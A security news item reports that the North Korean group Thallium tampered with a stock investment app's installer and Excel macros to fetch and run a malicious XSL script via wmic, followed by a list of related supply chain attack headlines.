Security News > 2021 > January > North Korean software supply chain attack targets stock investors
North Korean hacking group Thallium has targeted users of a private stock investment messenger service in a software supply chain attack, according to a report published this week.
Attackers alter the installer of a stock investment app.
Within the legitimate installer of the stock investment platform, attackers injected specific commands that fetched a malicious XSL script from a rogue FTP server, and executed it on Windows systems via the in-built wmic.
Excel macros also used to deliver the payload. ESTsecurity researchers also observed Microsoft Office documents, such as Excel spreadsheets which contained macros were distributing the aforementioned XSL script payload. "ESRC is paying attention to the fact that the Thallium organization is using the 'XSL Script Processing' technique not only in spear phishing attacks based on malicious documents, but also for niche attacks including supply chain attacks," stated ESTsecurity researchers in their translated report.
Whether the goal behind this attack was monetary gain or espionage on traders, supply chain attacks have become a common nuisance of these times.
Last month, attackers targeted the open-source ecosystem RubyGems in a software supply chain attack to steal cryptocurrency from infected machines.
News URL
Related news
- Blue Yonder ransomware attack disrupts grocery store supply chain (source)
- North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks (source)
- OpenWrt orders router firmware updates after supply chain attack scare (source)
- Update your OpenWrt router! Security issue made supply chain attack possible (source)
- Ultralytics Supply-Chain Attack (source)
- 390,000 WordPress accounts stolen from hackers in supply chain attack (source)
- Rspack npm Packages Compromised with Crypto Mining Malware in Supply Chain Attack (source)
- It's only a matter of time before LLMs jump start supply-chain attacks (source)